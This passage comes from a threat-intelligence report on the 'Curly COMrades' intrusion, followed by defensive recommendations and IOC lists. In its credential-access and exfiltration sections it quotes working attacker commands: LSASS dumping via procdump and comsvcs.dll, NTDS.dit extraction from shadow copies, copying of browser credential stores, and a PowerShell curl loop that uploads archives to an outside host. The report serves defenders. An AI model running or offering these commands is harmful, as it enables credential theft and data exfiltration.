observed across various phases of the intrusion. The following table lists batch files that are\r\nassessed to have been used for information-gathering purposes; however, this conclusion is based solely on file names, as\r\nthe contents of the files could not be recovered during the investigation: \r\nDiscovery - Scripts \r\nc:\\programdata\\tr.bat \r\nc:\\programdata\\gtad.bat \r\nc:\\programdata\\list_AD.bat \r\nc:\\programdata\\gu.bat \r\nc:\\programdata\\q.bat \r\n Credentials Access \r\nThe techniques employed by the attackers did not exhibit any particular novelty and closely resembled widely recognized\r\nmethods for extracting credentials from domain controllers and Windows systems. Sometimes, their approach appeared to\r\nrely on attempting multiple techniques until successful access was achieved. Tools and methods observed included\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 12 of 18\n\nMimikatz, the comsvcs various LOLBins, procdump, DCSync attacks, and NTDS database extraction via Volume Shadow\r\nCopy. \r\nCredentials - Dump  \r\nC:\\programdata\\procdump.exe -accepteula -ma 676 C:\\\\programdata\\\\lss.dmp \r\ncmd.exe /Q /c for /f \"tokens=1,2 delims= \" ^%A in ('\"tasklist /fi \"Imagename eq lsass.exe\" | find \"lsass\"\"') do\r\nrundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, #+0000^24 ^%B \\\\Windows\\\\Temp\\\\iK5.lnk full \r\nIn several instances, custom tools were observed being used to extract LSASS memory. However, these tools were assessed\r\nto be unlikely developed in-house and were more plausibly adapted from existing open-source proof-of-concept\r\nimplementations. One such instance involved attempts to deploy executables on a compromised system.  The selected file\r\npaths included C:\\ProgramData\\TB.exe, C:\\ProgramData\\TSB.exe, and C:\\ProgramData\\TBD.exe. \r\nSubsequent analysis of these samples indicated that they had been built from the TrickDump project. Notably, one of the\r\nbinaries was found to implement the same AES encryption scheme for the memory dump used in the MucorAgent, with the\r\nencryption key and initialization vector (IV) set to identical values. The specific key observed—q4v1toz93nklpr4i— bears a\r\nnotable resemblance to the keys employed in the payload encryption used by MucorAgent. \r\nAnother custom tool intended for LSASS memory dumping was identified as C:\\ProgramData\\Results.exe (MD5:\r\n5ed6b17103b231e9ff2abda1094083e3). This binary contains shellcode embedded within the .rdata section, which is\r\nexecuted after modifying memory protections via the VirtualProtect() Windows API. Upon execution, the shellcode loads\r\ndbgcore.dll and invokes MiniDumpWriteDump() to generate a memory dump of the lsass.exe process, which is then saved\r\nas lsass.dmp. \r\nAttempts to extract the ntds.dit file were carried out periodically by manually copying both the ntds.dit and the SYSTEM\r\nhive from a shadow copy of the system drive. Notably, following the issuance of these commands, the batch file\r\nC:\\ProgramData\\rar.bat archived all files located in C:\\Users\\Public\\Documents. This batch file was observed being used on\r\nmultiple occasions across several systems, suggesting that C:\\Users\\Public\\Documents served as a common staging location\r\nroutinely utilized by the attackers. \r\nCredentials – Extraction \r\ncmd.exe /C vssadmin list shadows \u003e C:\\\\Windows\\\\Temp\\\\eEYBczZA.tmp 2\u003e\u00261 \r\ncmd.exe /C vssadmin create shadow /for=C: \u003e C:\\\\Windows\\\\Temp\\\\oIkXWolk.tmp 2\u003e\u00261 \r\ncmd.exe /C copy /y \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit\r\nc:\\Users\\Public\\documents \u003e C:\\\\Windows\\\\Temp\\\\TJuAVkwx.tmp 2\u003e\u00261 \r\ncmd.exe /C copy /y \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\system32\\config\\system\r\nc:\\Users\\Public\\documents \u003e C:\\\\Windows\\\\Temp\\\\CXkSutIz.tmp 2\u003e\u00261 \r\nCmd.exe /C c:\\programdata\\rar.bat \u003e C:\\\\Windows\\\\Temp\\\\Qtodwvvz.tmp 2\u003e\u00261 \r\ncmd.exe /c \"c:\\programdata\\Rar.exe\" a c:\\programdata\\\u003credacted\u003e.rar c:\\users\\Public\\documents\\\\ -u -r -y -m5 -inul -\r\nhpJ347Hw -v2048k \r\nAdditional commands related to credential access were identified during the investigation. These included the use of reg.exe\r\nto inspect the HKLM\\Security\\Policy\\Secrets registry path, as well as the copying of the Chrome login data folder and\r\nFirefox’s key4.db file. These actions were likely intended to facilitate the exfiltration of stored credentials: \r\nCredentials – Apps Credentials Extraction \r\ncmd.exe /C reg query HKLM\\\\Security\\\\Policy\\\\Secrets\\\\_SC_MSSQLSERVER\\\\CurrVal \u003e\r\nC:\\\\Windows\\\\Temp\\\\KQPGjxdB.tmp 2\u003e\u00261 \r\ncmd.exe /C reg query HKLM\\\\Security\\\\Policy\\\\Secrets\\\\_SC_MSSQLSERVER \u003e C:\\\\Windows\\\\Temp\\\\AVFVmJxu.tmp\r\n2\u003e\u00261 \r\ncmd.exe /C reg query HKLM\\\\Security\\\\Policy\\\\Secrets \u003e C:\\\\Windows\\\\Temp\\\\UHopbQrR.tmp 2\u003e\u00261 \r\ncmd.exe /C copy /Y \"C:\\\\users\\\\\u003credacted\u003e\\\\AppData\\\\Local\\\\Google\\\\chrome\\\\User data\\\\Default\\\\login Data\"\r\nC:\\\\programdata\\\\L \u003e C:\\\\Windows\\\\Temp\\\\oIREnOOg.tmp 2\u003e\u00261 \r\ncmd.exe /C reg query HKEY_USERS\\\\\u003cSID\u003e\\\\environment \u003e C:\\\\Windows\\\\Temp\\\\SvkVsqpN.tmp 2\u003e\u00261 \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 13 of 18\n\ncmd.exe /C copy /y \"C:\\\\users\\\\\u003credacted\u003e\\\\appdata\\\\roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\a3nhez3h.default-release-1629700254215\\\\key4.db\" C:\\\\programdata\\\\k \u003e C:\\\\WINDOWS\\\\Temp\\\\BHMhyyOi.tmp 2\u003e\u00261 \r\nExfiltration \r\nExfiltration attempts were observed relatively infrequently and appeared to involve manual intervention by the attackers,\r\nlikely to minimize operational noise. \r\nA recurring pattern identified across these attempts was the execution of rar.bat, which archived the contents of the\r\nC:\\Users\\Public\\Documents directory—a location previously noted as a staging area during NTDS dump operations.\r\nAdditionally, commands were observed for copying the contents of the scripts folder from the SYSVOL share of a domain.\r\nTraces of archive files bearing names suggestive of internal application storage were also detected, reflecting a broad scope\r\nof interest on the part of the attackers. \r\nExfiltration \r\ncmd.exe /C dir \\\\\u003cdomain controller\u003e\\SYSVOL \u003e c:\\\\Programdata\\\\WindowsUpdateTask_y.tmp 2\u003e\u00261 \r\ncmd.exe /C dir \\\\\u003cdomain controller\u003e\\SYSVO L\\\u003cdomain\u003e\\scripts \u003e c:\\\\Programdata\\\\WindowsUpdateTask_p.tmp\r\n2\u003e\u00261 \r\ncmd.exe /C echo copy /y \\\\\u003cdomain controller\u003e\\SYSVO L\\\u003cdomain\u003e\\scripts\\* c:\\users\\Public\\documents\\ | cmd \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_m.tmp 2\u003e\u00261 \r\n\"c:\\Program Files\\WinRar\\Rar.exe\" a c:\\programdata\\\u003credacted\u003e.rar \"c:\\users\\public\\Documents\" -u -r -y -m5 -inul -\r\nhpB6uqLX3 -v1024k \r\ncmd.exe /C curl -k https://ipinfo.io/json \u003e c:\\\\Programdata\\\\WindowsUpdateTask_f.tmp 2\u003e\u00261 \r\ncmd.exe /C echo powershell.exe -ep bypass -f c:\\\\programdata\\\\run.ps1 | cmd \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_P.tmp 2\u003e\u00261 \r\nThe archives from the staging directory were then exfiltrated using curl.exe, an operation that was automated through the\r\nexecution of a PowerShell script named run.ps1: \r\n$path = \"c:\\programdata\"; $files = Get-ChildItem -Path $path -Filter \"*.rar\" | Sort-Object;  \r\nforeach ($file in $files.FullName) { Start-Sleep -s 5; curl.exe -k -X POST -H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64;\r\nrv:91.0) Gecko/20100101 Firefox/91.0\" --upload-file $file https://\u003credacted\u003e[.]by/contact_us; }  \r\nStart-Sleep -s 20;  \r\ncmd.exe /c del /f /q c:\\programdata*.rar \r\nThe archives were uploaded to a site assessed to be compromised—an approach consistently observed in other attacker\r\nactivities, including the deployment of SOCKS proxy relays and likely command-and-control infrastructure associated with\r\nMucorAgent. Finally, data was exfiltrated to compromised servers. \r\nConclusion \r\nThe campaign analyzed revealed a highly persistent and adaptable threat actor employing a wide range of known and\r\ncustomized techniques to establish and maintain long-term access within targeted environments. The attackers relied heavily\r\non publicly available tools, open-source projects, and LOLBins, showing a preference for stealth, flexibility, and minimal\r\ndetection rather than exploiting novel vulnerabilities. \r\nPersistence was achieved through valid credentials, multiple proxy relays, scheduled tasks, and in some cases, the use of\r\nremote monitoring software such as Remote Utilities. Sophisticated malware such as MucorAgent, recently discovered\r\nduring the investigation, exemplifies the technical capabilities of the actor. This modular implant employed COM hijacking,\r\nAES-encrypted PowerShell payloads, and covert exfiltration mechanisms using tools like curl.exe disguised as legitimate\r\nprocesses. \r\nCredential access was pursued through various means, including Mimikatz, comsvcs.dll abuse, LSASS memory dumping,\r\nand NTDS.dit extraction using shadow copies. Evidence also pointed to the use of adapted open-source tools such as\r\nTrickDump and custom shellcode loaders designed to evade detection. \r\nExfiltration activity was deliberately sparse and manually executed to avoid triggering alerts. Files of interest—including\r\ncredentials, domain information, and internal application data—were staged in publicly accessible locations on victim\r\nmachines, commonly C:\\Users\\Public\\Documents, and then archived and exfiltrated to attacker-controlled servers. \r\nThe overall behavior indicates a methodical approach in which the attackers combined standard attack techniques with\r\ntailored implementations to blend into legitimate system activity. Their operations were characterized by repeated trial-and-https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 14 of 18\n\nerror, use of redundant methods, and incremental setup steps - all aimed at maintaining a resilient and low-noise foothold\r\nacross multiple systems. \r\nRecommendations \r\nOur investigations often reveal a critical security gap: organizations often can't effectively detect or respond to the \"noise\"\r\nsophisticated threat actors generate. This is typically due to either a lack of modern EDR/XDR sensors, leaving them blind\r\nto suspicious activities, or, even with these platforms, an absence of dedicated security operations to act on alerts. This dual\r\ndeficiency in both technology and operational readiness allows inevitable security incidents to become preventable security\r\nbreaches. \r\nImplement Comprehensive XDR for Behavior Anomaly Detection \r\nA robust security platform like GravityZone with strong EDR/XDR capabilities is essential. This includes analyzing\r\nprocess anomalies and suspicious network activity, focusing on proxy tools (like Resocks, SSH, Stunnel) and\r\nobfuscated malware that threat actors use to mask their C2. \r\nActively monitor for attempts to extract the NTDS database from domain controllers and dump LSASS memory. \r\nIdentify and block network-based attacks, remote command execution (like Atexec), and credential-stuffing\r\nattempts. \r\nContinuously monitor system and registry changes to uncover anomalous persistence, like CLSID hijacking. \r\nDetect unusual data transfers by common tools like curl.exe to external, potentially compromised, web servers,\r\nlooking for suspicious traffic patterns or C2 communications blending with legitimate web traffic. \r\nProactively Limit LOLBins and RMM Abuse \r\nUse behavioral analytics to identify deviations from normal user and system activity, which are often indicative of\r\n\"Living off the Land\" binaries (LOLBins) or legitimate Remote Monitoring and Management (RMM) tool abuse. \r\nTry to limit an attacker's ability to exploit these commonly abused tools by restricting their access or execution when\r\nnot necessary with new solutions like GravityZone PHASR. \r\nConsider Managed Detection and Response (MDR) for Operational Gaps \r\nFor organizations without a dedicated Security Operations Center (SOC) team or operating with a lean security staff,\r\nadopting Managed Detection and Response (MDR) services offers an effective solution. MDR effectively acts as an\r\nextension of an in-house team, providing 24/7 expert threat hunting, rapid incident response, and continuous\r\nmonitoring. \r\nMDR services can specifically detect stealthy tactics such as credential theft and novel persistence methods,\r\nincluding leveraging CTI-driven threat hunting and prioritized monitoring of critical assets like domain controllers. \r\nBy focusing on these areas, organizations can build a more resilient security posture, capable of detecting and responding to\r\neven the most covert and persistent adversaries. \r\nIOCs \r\nFile Information \r\nc:\\program files (x86)\\google\\googleupdate.exe  b55e8e1d84d03ffe885e63a53a9acc7d \r\nc:\\program files (x86)\\google\\googleupdate.exe  dd253f7403644cfa09d8e42a7120180d \r\nc:\\programdata\\driversetuputility\\updater2\\task.conf  e9ef648f689e1ccaae5507500e7f9ecf \r\nc:\\programdata\\gretech\\gomplayer\\appconfig  ccc79a123413544c916de995e3876bbd \r\nc:\\programdata\\gtad.bat  c1ee06aec2a8ba13d61f443ec531fda9 \r\nc:\\programdata\\hp.exe  44a57a7c388af4d96771ab23e85b7f1e \r\nc:\\programdata\\intel\\logs\\data\\tasklauncher.dll  5a8ff502d94fe51ba84e4c0627d43791 \r\nc:\\programdata\\intel\\logs\\data\\tasklauncher.dll  c1cdca4f765f38675a4c4dfc5e5f7e59 \r\nc:\\programdata\\kmsautos\\bin\\driver\\x64wdv\\windivert.conf  b5e61b541d09bd198a0f628f7d91e001 \r\nc:\\programdata\\kmsautos\\bin\\driver\\x64wdv\\windivert.xml  11ee26e1fa93d7c31197d8d28509df59 \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 15 of 18\n\nc:\\programdata\\kmsautos\\bin\\driver\\x64wdv\\windivert.xml  ff14ba2e10a6c1d183fab730b0acaeb3 \r\nc:\\programdata\\l.exe  e262c1606ee3db38eb80158f624eeda8 \r\nc:\\programdata\\mi64.exe  9f42bd90075e8a51b46af9315d11a1c7 \r\nc:\\programdata\\microsoft\\drm\\msedge.exe  dc40b5c914e5f41a6b4bc19831c88892 \r\nc:\\programdata\\microsoft\\drm\\server\\drm.exe  2d007c5bd0b84ca9c9b4c6b4c17bd997 \r\nc:\\programdata\\microsoft\\drm\\server\\drm.exe  7fd5258b5056a46340e28463feb2a956 \r\nc:\\programdata\\microsoft\\edgeupdate\\checkupdate.exe  dc40b5c914e5f41a6b4bc19831c88892 \r\nc:\\programdata\\microsoft\\edgeupdate\\msedge.exe  dc40b5c914e5f41a6b4bc19831c88892 \r\nc:\\programdata\\microsoft\\mf\\mf.exe  44a57a7c388af4d96771ab23e85b7f1e \r\nc:\\programdata\\microsoft\\uev\\templates\\settingslocationtemplate2013c.xsd   \r\nc:\\programdata\\oracle\\java\\.oracle_jre_usage\\java.exe  2f6bc7f137c689add399402e485aa604 \r\nc:\\programdata\\rar.bat  2faa07a3babbe6e46107468e5b1d0b85 \r\nc:\\programdata\\results.exe  5ed6b17103b231e9ff2abda1094083e3 \r\nc:\\programdata\\run.ps1  23f7fb65686671e0b0bbc2ae9abec626 \r\nc:\\programdata\\run.ps1  27f97ee371bb31238b9f945bdc4ccf65 \r\nc:\\programdata\\s  6d08bab1d4418db2a0b28d6d125181ac \r\nc:\\programdata\\s.exe  65dca8f16286c2e1fd7bf5ed52796c54 \r\nc:\\programdata\\ssh\\sshelp.exe  dc40b5c914e5f41a6b4bc19831c88892 \r\nc:\\programdata\\symantec\\symantec.exe  dc40b5c914e5f41a6b4bc19831c88892 \r\nc:\\programdata\\t.bat  595ccc44bc6be7fb3f1eb98b724b0de0 \r\nc:\\programdata\\t.bat  6fc8f7e528c272c957ae4e2548c3aad3 \r\nc:\\programdata\\t.bat  8a95da943b4d02a01b61e5b422338b81 \r\nc:\\programdata\\t.bat  cdf7e3e4f881e9a59edf779d408b88e8 \r\nc:\\programdata\\tasklauncher_t.dll  5d3e3160e8ce03661150451e4a2ef5e0 \r\nc:\\programdata\\tb.exe  171f097c66ee0c6a69dde5da994ed8a7 \r\nc:\\programdata\\tbd.exe  100454b6ae298627606d54d2427524c2 \r\nc:\\programdata\\tbd.exe  465015009fa6d66a52cc670e2941edcd \r\nc:\\programdata\\tbd.exe  d92dfa7ed017f878c5eebfaedc1fbeaa \r\nc:\\programdata\\tbd.exe  ed71945940182f5b249542bfcc5df2f8 \r\nc:\\programdata\\tsb.exe  90c0fb97727c73c7b260a13ae5e01ad4 \r\nc:\\programdata\\updater.ps1  9fcbcf340267782dcf99e4d4995954be \r\nc:\\programdata\\updater.ps1  4eedc056f970fce35e425f4cc80c1fc6 \r\nc:\\programdata\\updater.ps1  a7da2adf356a9055c3e827a22f817405 \r\nc:\\programdata\\updater.ps1  af490e6e66d30e6c14e48ba968f50edf \r\nc:\\programdata\\updater.ps1  b9c99f411f7b23d50a8311ce85820353 \r\nc:\\programdata\\updater.ps1  d743a064f05b6b4041bdf22eac778f21 \r\nc:\\programdata\\usoshared\\logs\\user\\fe8c4219-a639-46f6-ac97-\r\n8035ff5a4a85\\packages\\tasklauncher.dll \r\n68f7a7c642ab9a58b42af4416052caa8 \r\nc:\\programdata\\vmware\\vmware tools\\vmtools.exe  00d6a804da6a61292bceb123942117d5 \r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\asp.netwebadminfiles\\appconfig\\appconfig  ff14ba2e10a6c1d183fab730b0acaeb3 \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 16 of 18\n\nc:\\windows\\temp\\nano.exe  e5a7d0df12094e9db90242092891b10e \r\nFile Paths \r\nc:\\programdata\\1.bat \r\nc:\\programdata\\ca.exe \r\nc:\\programdata\\ch_prm.bat \r\nc:\\programdata\\curl.taskhandler.xml \r\nc:\\programdata\\de434264-8fe9-4c0b-a83b-89ebeebff78e.reg  \r\nc:\\programdata\\documents.bat \r\nc:\\programdata\\drm.exe \r\nc:\\programdata\\getfolder.bat \r\nc:\\programdata\\h.ps1 \r\nc:\\programdata\\list_ad.bat \r\nc:\\programdata\\microsoft\\devicesync\\sync.conf \r\nc:\\programdata\\oracle\\java\\java.exe \r\nc:\\programdata\\q.bat \r\nc:\\programdata\\r.ps1 \r\nc:\\programdata\\rar.bat \r\nc:\\programdata\\reg_1.ps1 \r\nc:\\programdata\\reg_1.ps1  \r\nc:\\programdata\\reg.ps1 \r\nc:\\programdata\\rs.exe \r\nc:\\programdata\\run.bat \r\nc:\\programdata\\kb_upd.ps1 \r\nc:\\programdata\\samsung\\printer\\service.conf \r\nc:\\users\\\u003cuser placeholder\u003e\\appdata\\roaming\\microsoft\\windows\\templates\\curl\\icon.png \r\nc:\\users\\\u003cuser placeholder\u003e\\appdata\\roaming\\microsoft\\windows\\templates\\curl\\image \r\nc:\\users\\\u003cuser placeholder\u003e\\appdata\\roaming\\microsoft\\windows\\templates\\curl\\index.png\r\nc:\\programdata\\microsoft\\uev\\templates\\settingslocationtemplate2013c.xsd\r\nProxy Servers \r\n75.127.13.136 \r\n207.180.194.109 \r\n91.107.174.190  \r\n96.30.124.103 \r\n45.43.91.10 \r\n194.87.31.171 \r\nScheduled Tasks \r\n\\microsoft\\windows\\devicedirectoryclient\\registerdevicesusb \r\n\\microsoft\\windows\\devicedirectoryclient\\registerdeviceprotectionusb \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 17 of 18\n\njavaupdate  \r\n\\mozilla\\browser.visualupdate \r\nmicrosoftedgeupdatetaskmachine \r\nmicrosoftt  \r\n\\microsoft\\windows\\updateorchestrator\\check_ac \r\nbackup \r\nWindows Services\r\nSource: https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds"
	],
	"report_names": [
		"curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds"
	],
	"threat_actors": [
		{
			"id": "8cb98420-1ff5-4a85-977b-b4e063eec334",
			"created_at": "2026-01-17T02:00:03.200683Z",
			"updated_at": "2026-04-10T02:00:03.896419Z",
			"deleted_at": null,
			"main_name": "Curly COMrades",
			"aliases": [],
			"source_name": "MISPGALAXY:Curly COMrades",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434650,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d6b6a4666e1efbf60c50e0c656e5a0079fba7447.pdf",
		"text": "https://archive.orkl.eu/d6b6a4666e1efbf60c50e0c656e5a0079fba7447.txt",
		"img": "https://archive.orkl.eu/d6b6a4666e1efbf60c50e0c656e5a0079fba7447.jpg"
	}
}